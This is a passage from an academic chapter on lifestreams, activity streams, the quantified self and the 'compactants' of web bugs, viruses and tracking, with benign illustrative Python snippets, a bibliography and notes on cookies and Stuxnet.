&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;blockquote&gt;a time-ordered stream of documents that functions as a diary of your electronic life; every document you create and every document other people send you is stored in your lifestream. The tail of your stream contains documents from the past (starting with your electronic birth certificate). Moving away from the tail and toward the present, your stream contains more recent documents --- papers in progress or new electronic mail; other documents (pictures, correspondence, bills, movies, voice mail, software) are stored in between. Moving beyond the present and into the future, the stream contains documents you ''will'' need: reminders, calendar items, to-do lists. You manage your lifestream through a small number of powerful operators that allow you to transparently store information, organize information on demand, filter and monitor incoming information, create reminders and calendar items in an integrated fashion, and 'compress' large numbers of documents into overviews or executive summaries. (Freeman, 2000)&lt;/blockquote&gt; &lt;br /&gt;
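&lt;br /&gt;
Freeman's description is, in effect, the specification of a data structure: a single time-ordered sequence holding past, present and future documents, organised on demand by filtering rather than by filing. A minimal sketch under that reading (Python; the document contents are invented for illustration): &lt;br /&gt;
&lt;br /&gt;
&lt;pre&gt;
# A minimal reading of the lifestream: one time-ordered sequence,
# queried by filtering rather than by folders. Contents are invented.
import bisect, time

stream = []  # (timestamp, document) pairs, kept in time order

def store(doc, when=None):
    if when is None:
        when = time.time()              # the present
    bisect.insort(stream, (when, doc))  # keep the stream time-ordered

def substream(word):
    # 'organize information on demand': every document mentioning word
    return [doc for t, doc in stream if word in doc]

store('electronic birth certificate', when=0.0)            # tail of the stream
store('draft paper on lifestreams')                        # the present
store('reminder: revise draft', when=time.time() + 86400)  # the future
print(substream('draft'))
&lt;/pre&gt;
&lt;br /&gt;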
Gelernter originally described these as ‘chronicle streams’ (Gelernter, 1994), highlighting both their narrative and temporal dimensions in relation to the storage of documentation and texts. Today we are more likely to think of them as the ‘real-time streams’ and timeline functions offered by systems like Twitter, Facebook and Google+. These are increasingly the model of interface design that is driving innovation in computation, especially in mobile and locative technologies. However, in contrast to the document-centric model that Gelernter and Freeman were describing, there are also the micro-streams of short updates, epitomized by Twitter with its text-message-sized updates of 140 characters. Nonetheless, this is still enough text space to incorporate a surprising amount of data, particularly when geodata, images, weblinks, and so forth are factored in. Stephen Wolfram was one of the first people to collect such data about himself systematically, starting in 1989. As he explains: 'So email is one kind of data I’ve systematically archived. And there’s a huge amount that can be learned from that. Another kind of data that I’ve been collecting is keystrokes. For many years, I’ve captured every keystroke I’ve typed—now more than 100 million of them' (Wolfram, 2012). &lt;br /&gt;
&lt;br /&gt;
This kind of self-collection of data is certainly becoming more prevalent, and in the context of reflexivity and self-knowledge it raises interesting questions: who owns and can access these personal archives, and what happens to self-understanding when it is increasingly mediated by metrics? The scale of the data collected can also be relatively large and unstructured. Nonetheless, better data management and techniques for searching and surfacing information from unstructured or semi-structured data will no doubt prove revealing about our everyday patterns in the future.[12] &lt;br /&gt;
&lt;br /&gt;
Mobile 'apps' - small, relatively contained applications that usually perform a single specific function - have accelerated this way of collecting and sending data. For example, the Twitter app on the iPhone allows the user to send updates to their timeline, but also to search other timelines, check out profiles, streams and so on. When created as apps, however, such services are also able to use the power of the local device, especially if it contains the kinds of sophisticated sensory circuitry that are common in smartphones, to log GPS location, direction of travel, and so forth. This is when life-streaming becomes increasingly similar to the activity of web bugs in monitoring and collecting data on the users who are active on the network. Indeed, activity streams have become a standard which is increasingly being incorporated into software across a number of media and software practices (see ActivityStreams n.d.). An activity stream essentially encodes a user event or activity into a form that can be computationally transmitted and later aggregated, searched and processed: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
*In its simplest form, an activity consists of an ''actor'', a ''verb'', an ''object'', and a ''target''. It tells the story of a person performing an action on or with an object -- 'Geraldine posted a photo to her album' or 'John shared a video'. In most cases these components will be explicit, but they may also be implied. (ActivityStreamsWG, 2011, original emphasis) &lt;br /&gt;
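&lt;br /&gt;
Concretely, in the JSON serialisation of the standard (ActivityStreamsWG, 2011) such an activity is a small self-describing record; the values below are invented for illustration: &lt;br /&gt;
&lt;br /&gt;
&lt;pre&gt;
# 'Geraldine posted a photo to her album' as a JSON activity;
# all values are invented for illustration.
import json

activity = {
    'published': '2012-03-04T12:00:00Z',
    'actor':  {'objectType': 'person', 'displayName': 'Geraldine'},
    'verb':   'post',
    'object': {'objectType': 'photo', 'url': 'http://example.org/p/1'},
    'target': {'objectType': 'photo-album', 'displayName': 'Holiday'},
}
print(json.dumps(activity))  # ready to be transmitted, aggregated, searched
&lt;/pre&gt;
&lt;br /&gt;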
&lt;br /&gt;
&lt;br /&gt;
This data and activity collection is only part of the picture, however. In order to become reflexive data it must be computationally processed from its raw state, which may be structured, unstructured, or a combination of the two. At this point it is common for the data to be visualized, usually through a graph or timeline, but there are also techniques such as heat-maps, graph theory, and so forth that enable the data to be processed and reprocessed to tease out patterns in the underlying data set. In both the individual and the aggregative use case, in other words for the individual user (or lifestreamer) and for the organization (such as Facebook), the key is to pattern-match and compare details of the data, such as against a norm, a historical data set, or a population, group, or class of others.[13] &lt;br /&gt;
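&lt;br /&gt;
A toy version of this comparison step might look as follows: each new data point is checked against a personal norm, here a trailing mean, and deviations are flagged for the visualisation layer. The window, threshold and step counts are all invented for illustration: &lt;br /&gt;
&lt;br /&gt;
&lt;pre&gt;
# Flag data points that deviate from a personal norm (a trailing mean).
from statistics import mean, stdev

def flag_outliers(stream, window=7, threshold=2.0):
    # yield (value, is_unusual) pairs relative to a trailing window
    history = []
    for value in stream:
        if len(history) &amp;gt;= window:
            recent = history[-window:]
            mu, sigma = mean(recent), stdev(recent)
            unusual = sigma &amp;gt; 0 and abs(value - mu) &amp;gt; threshold * sigma
            yield value, unusual
        else:
            yield value, False  # not enough history for a norm yet
        history.append(value)

steps_per_day = [8200, 7900, 8500, 8100, 7800, 8300, 8000, 2100]
for value, unusual in flag_outliers(steps_per_day):
    print(value, 'unusual' if unusual else 'normal')
&lt;/pre&gt;
&lt;br /&gt;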
&lt;br /&gt;
The patterned usage is therefore a dynamic real-time feedback mechanism, in terms of providing steers for behaviour, norms and so forth, but it also offers a documentary narcissism that appears to give the user an existential confirmation and status. Even in its so-called gamification forms, the awarding of competitive points, badges, honours and positional goods more generally amounts to the construction of a hierarchical social structure within the group of users. It also encourages users to think of themselves as a set of partial objects, fragmented dividuals, or loosely connected properties, collected as a time-series of data-points and subject to intervention and control. This can be thought of as a computational 'care of the self', facilitated by an army of oligoptica (Latour, 2005) in the wider computational environment that observe and store behavioural and affective data. However, this self is reconciled through the code and software that make the data make sense. The code and software are therefore responsible for creating and maintaining meaning and narratives, providing a stabilising web of meaning for the actor.[14] &lt;br /&gt;
&lt;br /&gt;
I now want to turn to how we might draw these case studies together to think about living in code and software and the implications for wider study in terms of research and theorisation of computational society. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== '''Conclusions'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
It seems that a thread runs through web bugs, viruses and now life-streaming itself: this is data collection, monitoring and real-time feedback, whether overt or covert. Whilst we can continue to study these phenomena in isolation, and indeed there can be very productive knowledge generated from this kind of research, it seems to me that we need to attend to the computationality represented in code and software to better understand such software ecologies (Berry, 2011). &lt;br /&gt;
&lt;br /&gt;
One of the most interesting aspects of these systems is that humans in many cases become the vectors that both enable the data transfers and carry the data that fuels the computational economy. Our movements between systems, carrying USB sticks and logging into email accounts and distant networks, create the channels through which data flows or an infection is spread. The ability of these viruses to take on some of the features of web bugs and learn our habits and preferences in real-time, whilst secreting themselves within our computer systems, raises important questions: about consent, about who is entitled to observe whom, and about what these hidden records of our behaviour may later be used for. However, users are actively downloading apps that advertise the fact that they collect this data, and seem to genuinely find an existential relief or recognition in their movements being recorded and available for later playback or analysis. Web bugs are in many ways life streams - albeit life streams that have not been authorized by the user whom they are monitoring. This collection of what we might call ''compactants'' is designed to ''passive-aggressively'' record data.[15] With the notion of ''compactants'' (computational actants) I want to draw particular attention to this passive-aggressive feature of computational agents that collect information: they are passive – under the surface, relatively benign and silent – yet aggressive in their hoarding of data – monitoring behavioural signals, streams of affectivity and so forth. The word ''compact'' has useful overtones of having all the necessary components or functions neatly fitted into a small package, and of conciseness in expression. The etymology, from the Latin ''compact'' for closely put together, or joined together, likewise neatly expresses the sense of what web bugs and related technologies are. Compactants are useful, finally, in relation to the notion of ''companion actants'' (see Haraway, 2003). &lt;br /&gt;
&lt;br /&gt;
Interestingly, compactants are structured in such a way that they can be understood as having a dichotomous structure of data-collection/visualisation, each of which is a specific mode of operation. Naturally, due to the huge quantities of data that are often generated, the computational processing and aggregation is often offloaded to the ‘cloud’, that is, to server computers designed specifically for the task and accessed via networks. Indeed, many viruses seek to ‘call home’ to report their status, upload data, or offer the chance of being updated, perhaps to a more aggressive version of themselves or to correct bugs. &lt;br /&gt;
&lt;br /&gt;
We might also think about the addressee of these wider computational systems made up of arrays or networks of compactants, which in many cases is a future actor. Within the quantified-self movement there is an explicit recognition that the “future self” will be required to undo the bad habits and behaviours of the present self. That is, there is an explicit normative relation to a ''future'' self, whom you, as the ''present'' self, may be treating unfairly, immorally or without due regard – what has been described as 'future self continuity' (Tugend, 2012). This inbuilt tendency toward the ''futural'' is a fascinating reflection of the internal representation of time within computational systems, that is, time-series-structured streams of real-time data, often organised as lists. Therefore the past (as stored data), the present (as current data collection, or processed archival data), and the future (as both the ethical addressee of the system and a potential provider of data and usage) are often deeply embedded in the code that runs these systems. In some cases the future also has an objective existence as a probabilistic projection, literally a ''code-object'', which is updated in real-time and which contains the major features of the future state represented as a model; computational weather prediction systems and climate change models are both examples of this. &lt;br /&gt;
&lt;br /&gt;
There are many examples of how attending to the code and software that structure many of the life, memory and biopolitical systems and industries of contemporary society could yield similarly revealing insights, both into our usage of code and software and into the structuring assumptions, conditions and affordances that are generated. Our use of computational models is growing, and our tendency is to confuse the screenic representation visualised by code/software with what we might call the real – not to mention our failure to appreciate the ways in which code’s mediation is co-constructive of, and deeply involved in, the stabilisation of everyday life today. Even so, within institutional contexts, code/software has not been fully incorporated into the specific logics of these social systems, and in many ways it undermines these structural and institutional forms. We must remain attentive to the fact that software engineering itself is a relatively recent discipline, and that its efforts at systematisation and rationalisation are piecemeal and incomplete, as the many hugely expensive software system failures attest. Of course, this code/software research is not easy: the techniques needed are still in their infancy, and whilst we can draw on a wide range of scholarly work from the sciences, social sciences and the arts and humanities, we are still developing our understanding. But this should give hope and direction to critical theorists, both of the present, looking to provide critique and counterfactuals, and ''of'' the future, as code/software is a particularly rich site for intervention, contestation and the ''unbuilding'' of code/software systems.[16] &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Acknowledgements'''  ==&lt;br /&gt;
&lt;br /&gt;
I am very grateful to the ''Forskningsrådet'' (Research Council of Norway) for the ''Yggdrasil'' fellowship ref: 211106 which funded my sabbatical in Oslo in 2012. I would also like to thank Anders Fagerjord, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo, for the kind invitation to be based at the university. An earlier version of this chapter was presented at UnlikeUs in March 2012, at the University of Amsterdam, and I would like to thank Geert Lovink for the kind invitation to present this work. I am also grateful to have had the opportunity to present versions of the chapter in this book to: PhiSci seminar series, organised by Rani Lill Anjum, CauSci (Causation in Science) and the UMB School of Economics and Business; ''Institutt for medier og kommunikasjon'' (IMK) seminar series, invited by Espen Ytreberg, University of Oslo; Digital Humanities Workshop, organized by Caroline Bassett, University of Sussex; the Media Innovations Colloquium organized by Tanja Storsul, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo; and the Archive in Motion workshop, ''Nasjonal Bibliotek'', organised by Ina Blom, University of Oslo. Many thanks are also due to Trine for proofing the documents included in this living book. &lt;br /&gt;
&lt;br /&gt;
== '''Bibliography'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
60 Minutes (2012a) Fmr. CIA head calls Stuxnet virus &amp;quot;good idea&amp;quot;, ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57388982/fmr-cia-head-calls-stuxnet-virus-good-idea/ &lt;br /&gt;
&lt;br /&gt;
60 Minutes (2012b) Stuxnet: Computer worm opens new era of warfare, ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57390124/stuxnet-computer-worm-opens-new-era-of-warfare/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreams (n.d.) Activity Streams, accessed 04/03/2012, http://activitystrea.ms/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreamsWG (2011) JSON Activity Streams 1.0, Activity Streams Working Group, accessed 04/03/2012, http://activitystrea.ms/specs/json/1.0/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Associated Press (2012) Iran says Stuxnet virus infected 16,000 computers, ''Associated Press'', accessed 04/03/2012, http://www.foxnews.com/world/2012/02/18/iran-says-stuxnet-virus-infected-16000-computers/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Berry, D. M. (2011) ''The Philosophy of Software: Code and Mediation in the Digital Age'', London: Palgrave. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Baker, J. (2012) European Watchdog Pushes for Do Not Track Protocol, accessed 10/03/2012, http://www.pcworld.com/businesscenter/article/251373/european_watchdog_pushes_for_do_not_track_protocol.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
CBS News (2010) Iran Confirms Stuxnet Worm Halted Centrifuges, ''CBSNews'', accessed 04/03/2012, http://www.cbsnews.com/stories/2010/11/29/world/main7100197.shtml &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cherry, S. (2010) How Stuxnet Is Rewriting the Cyberterrorism Playbook, ''IEEE Spectrum: Inside Technology'', accessed 04/03/2012, http://spectrum.ieee.org/podcast/telecom/security/how-stuxnet-is-rewriting-the-cyberterrorism-playbook &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cryptome (2010) Stuxnet Myrtus or MyRTUs?, accessed 04/03/2012, http://cryptome.org/0002/myrtus-v-myRTUs.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Deuze, M., Blank, P. and Speers, L. (2012) A Life Lived in Media, ''Digital Humanities Quarterly'', Winter 2012, Volume 6, Number 1, accessed 29/02/2012, http://digitalhumanities.org/dhq/vol/6/1/000110/000110.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Dobias, J. (2010) Privacy Effects of Web Bugs Amplified by Web 2.0, in Fischer-Hübner, S., Duquenoy, P., Hansen, M., Leenes, R., and Zhang, G. (eds.) ''Privacy and Identity Management for Life'', London: Springer. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Economist (2012) Counting every moment, ''The Economist'', accessed 02/03/2012, http://www.economist.com/node/21548493 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
EFF (1999) The Web Bug FAQ, accessed 02/03/2012, http://w2.eff.org/Privacy/Marketing/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evans, S. (2012) Duqu Trojan used 'unknown' programming language: Kaspersky, CBR Software Malware, accessed 09/03/2012, http://malware.cbronline.com/news/duqu-trojan-used-unknown-programming-language-kaspersky-070312 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evers, J. (2006) How HP bugged e-mail, accessed 02/03/2012, http://news.cnet.com/How-HP-bugged-e-mail/2100-1029_3-6121048.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Eyal, N. (2012) How To Manufacture Desire, ''TechCrunch'', accessed 05/03/2012, http://techcrunch.com/2012/03/04/how-to-manufacture-desire/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Fried, I. (2006) Dunn grilled by Congress, accessed 02/03/2012, http://news.cnet.com/Dunn-grilled-by-Congress/2100-1014_3-6120625.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (1997) The Lifestreams Software Architecture, Ph.D. Dissertation, Yale University Department of Computer Science, May 1997, accessed 02/03/2012, http://www.cs.yale.edu/homes/freeman/dissertation/etf.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (2000) Welcome to the Yale Lifestreams homepage!, accessed 02/03/2012, http://cs-www.cs.yale.edu/homes/freeman/lifestreams.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Garber, M. (2012) Americans Love Google! Americans Hate Google!, ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/03/americans-love-google-americans-hate-google/254253/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (1994) The cyber-road not taken, ''The Washington Post'', April 1994. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (2010) Time To Start Taking The Internet Seriously, ''The Edge'', accessed 02/03/2012, http://www.edge.org/3rd_culture/gelernter10/gelernter10_index.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2010) The Many Data Hats a Company can Wear, accessed 02/03/2012, http://purplebox.ghostery.com/?p=948639073 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2011) Ghostrank Planetary System, accessed 02/03/2012, http://purplebox.ghostery.com/?p=1016021670 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012a) About Ghostery, accessed 02/03/2012, http://www.ghostery.com/about &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012b) About ChartBeat, accessed 02/03/2012, http://www.ghostery.com/apps/chartbeat &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gostev, A. (2012) Stuxnet/Duqu: The Evolution of Drivers, SecureList, accessed 02/03/2012, https://www.securelist.com/en/analysis/204792208/Stuxnet_Duqu_The_Evolution_of_Drivers &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gross, M. J. (2011) A Declaration of Cyber-War, ''Vanity Fair'', accessed 02/03/2012, http://www.vanityfair.com/culture/features/2011/04/stuxnet-201104 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Haraway, D. (2003) ''The Companion Species Manifesto: Dogs, People, and Significant Otherness'', Prickly Paradigm Press. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hayles, N. K. (2004) Print Is Flat, Code Is Deep: The Importance of Media-Specific Analysis, ''Poetics Today'', 25:1, pp 67-90. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hopkins, N. (2011) 'New Stuxnet' worm targets companies in Europe, ''The Guardian'', http://www.guardian.co.uk/technology/2011/oct/19/stuxnet-worm-europe-duqu &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Kruszelnicki, K. (2011) Stuxnet opens cracks in Iran nuclear program, accessed 02/03/2012, http://www.abc.net.au/science/articles/2011/10/26/3348123.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Langner, R. (2011) Ralph Langner: Cracking Stuxnet, a 21st-century cyberweapon, accessed 02/03/2012, http://www.youtube.com/watch?feature=player_embedded&amp;amp;amp;v=CS01Hmjv1pQ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Luma (2010) Display Advertising Technology Landscape, accessed 02/03/2012, http://www.lumapartners.com &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Madrigal, A. (2012) I'm Being Followed: How Google—and 104 Other Companies—Are Tracking Me on the Web, ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/02/im-being-followed-how-google-and-104-other-companies-are-tracking-me-on-the-web/253758/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Markoff, J. and Sanger, D. E. (2010) In a Computer Worm, a Possible Biblical Clue, ''The New York Times'', accessed 04/03/2012, http://www.nytimes.com/2010/09/30/world/middleeast/30worm.html?_r=1 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Matrosov, A., Rodionov, E., Harley, D. and Malcho, J. (n.d.) Stuxnet Under the Microscope, accessed 04/03/2012, http://go.eset.com/us/resources/white-papers/Stuxnet_Under_the_Microscope.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mitcham, C. (1998) The Importance of Philosophy to Engineering, ''Teorema'', Vol. XVII/3, pp. 27-47. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mittal, S. (2010) User Privacy and the Evolution of Third-party Tracking Mechanisms on the World Wide Web, Thesis, accessed 04/03/2012, http://www.stanford.edu/~sonalm/Mittal_Thesis.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mmpc2 (2010) The Stuxnet Sting, accessed 04/03/2012, http://blogs.technet.com/b/mmpc/archive/2010/07/16/the-stuxnet-sting.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Peterson, D. G. (2012) Langner’s Stuxnet Deep Dive S4 Video, accessed 04/03/2012, http://www.digitalbond.com/2012/01/31/langners-stuxnet-deep-dive-s4-video/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Pew (2012) Search Engine Use 2012, accessed 09/03/2012, http://pewinternet.org/Reports/2012/Search-Engine-Use-2012/Summary-of-findings.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Rieland, R. (2012) So What Do We Do With All This Data?, ''The Smithsonian'', accessed 04/03/2012, http://blogs.smithsonianmag.com/ideas/2012/01/so-what-do-we-do-with-all-this-data/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Sense (2012) Feel. Act. Make sense, accessed 04/03/2012, http://open.sen.se/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Tugend, A. (2012) Bad Habits? My Future Self Will Deal With That, accessed 04/03/2012, http://www.nytimes.com/2012/02/25/business/another-theory-on-why-bad-habits-are-hard-to-break-shortcuts.html?_r=3&amp;amp;amp;pagewanted=all &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
W3C (2012) Tracking Protection Working Group, accessed 14/03/2012, http://www.w3.org/2011/tracking-protection/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Wolfram, S. (2012) The Personal Analytics of My Life, accessed 09/03/2012, http://blog.stephenwolfram.com/2012/03/the-personal-analytics-of-my-life/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Yarrow, J. (2011) CHART OF THE DAY: Here's How Much A Unique Visitor Is Worth, ''Business Insider'', accessed 02/03/2012, http://www.businessinsider.com/chart-of-the-day-revenue-per-unique-visitor-2011-1 &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2010) Blockbuster Worm Aimed for Infrastructure, But No Proof Iran Nukes Were Target, ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/09/stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2011) Report Strengthens Suspicions That Stuxnet Sabotaged Iran’s Nuclear Plant, ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/12/isis-report-on-stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== Notes  ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[1] These include HTTP cookies, Locally Stored Objects (LSOs), and Document Object Model storage (DOM storage). &lt;br /&gt;
&lt;br /&gt;
[2] ‘Cookies are small pieces of text that servers can set and read from a client computer in order to register its “state.” They have strictly specified structures and can contain no more than 4 KB of data each. When a user navigates to a particular domain, the domain may call a script to set a cookie on the user’s machine. The browser will send this cookie in all subsequent communication between the client and the server until the cookie expires or is reset by the server’ (Mittal 2010: 10). &lt;br /&gt;
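&lt;br /&gt;
As a minimal illustration of the mechanism described in this note, the following sketch (Python, standard library; the identifier is invented) constructs the Set-Cookie header a server would send: &lt;br /&gt;
&lt;br /&gt;
&lt;pre&gt;
# The server registers 'state' by setting a cookie that the browser
# returns on every subsequent request. The identifier is invented.
from http import cookies

jar = cookies.SimpleCookie()
jar['uid'] = 'abc123'          # up to 4 KB of text per cookie
jar['uid']['max-age'] = 86400  # lifetime in seconds; the server can reset it
print(jar.output())            # the Set-Cookie header sent to the browser
# later requests from the same browser carry back: Cookie: uid=abc123
&lt;/pre&gt;
&lt;br /&gt;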
&lt;br /&gt;
[3] Ghostery describes itself on its help page: “Be a web detective. Ghostery is your window into the invisible web – tags, web bugs, pixels and beacons that are included on web pages in order to get an idea of your online behavior. Ghostery tracks the trackers and gives you a roll-call of the ad networks, behavioral data providers, web publishers, and other companies interested in your activity” (Ghostery 2012a). &lt;br /&gt;
&lt;br /&gt;
[4] For an example see, http://static.chartbeat.com/js/chartbeat.js &lt;br /&gt;
&lt;br /&gt;
[5] Also see examples at: (1) [http://static.chartbeat.com/js/chartbeat.js Chartbeat] &amp;amp;nbsp;; (2) [http://www.google-analytics.com/ga.js Google Analytics] &amp;amp;nbsp;; (3) [http://o.aolcdn.com/omniunih.js Omniture] &amp;amp;nbsp;; (4) [http://o.aolcdn.com/ads/adsWrapper.js Advertising.com] &lt;br /&gt;
&lt;br /&gt;
[6] A computer worm is technically similar in design to a virus and is therefore considered to be a sub-class of a virus. Indeed, worms spread from computer to computer, often across networks, but unlike a virus, a worm has the ability to transfer itself without requiring any human action. A worm is able to do this by taking advantage of the file or information transport features, such as the networking setup, on a computer, which it exploits to enable it to travel from computer to computer unaided. &lt;br /&gt;
&lt;br /&gt;
[7] One of the ways in which the Stuxnet attack target was identified was through a close reading of the computer code that was disassembled from the worm, and careful analysis of the internal data structures and finite state machine used to structure the attack. Ironically, this was then matched by Ralph Langner against photographs that had been uploaded to the website of the President of Iran, Mahmoud Ahmadinejad: careful analysis of background images accidentally photographed on computers used by the president confirmed the importance of the cascade structure, the centrifuge layout and the enriching process; see [http://www.president.ir/en/9172 http://www.president.ir/en/9172] (see Peterson, 2012). &lt;br /&gt;
&lt;br /&gt;
[8] The timestamp in the file ~wtr4141.tmp indicates that the date of compilation was 03/02/2010 (Matrosov et al., n.d.), although there is suspicion that there were three versions of the Stuxnet code: 'Most curious, there were two major variants of the worm. The earliest versions of it, which appear to have been released in the summer of 2009, were extremely sophisticated in some ways but fairly primitive in others, compared with the newer version, which seems to have first circulated in March 2010. A third variant, containing minor improvements, appeared in April. In Schouwenberg’s view, this may mean that the authors thought Stuxnet wasn’t moving fast enough, or had not hit its target, so they created a more aggressive delivery mechanism. The authors, he thinks, weighed the risk of discovery against the risk of a mission failure and chose the former' (Gross, 2011). &lt;br /&gt;
&lt;br /&gt;
[9] There are, though, some criticisms that this link may be spurious; for instance, Cryptome (2010) argues: 'It may be that the &amp;quot;myrtus&amp;quot; string from the recovered Stuxnet file path &amp;quot;b:\myrtus\src\objfre_w2k_x86\i386\guava.pdb&amp;quot; stands for &amp;quot;My-RTUs&amp;quot;, as in Remote Terminal Unit.' &lt;br /&gt;
&lt;br /&gt;
[10] After having performed detailed analysis of the Duqu code, Kaspersky Labs stated that they 'are 100% confident that the Duqu Framework was not programmed with Visual C++. It is possible that its authors used an in-house framework to generate intermediary C code, or they used another completely different programming language' (Evans, 2012). &lt;br /&gt;
&lt;br /&gt;
[11] See http://quantifiedself.com/ &lt;br /&gt;
&lt;br /&gt;
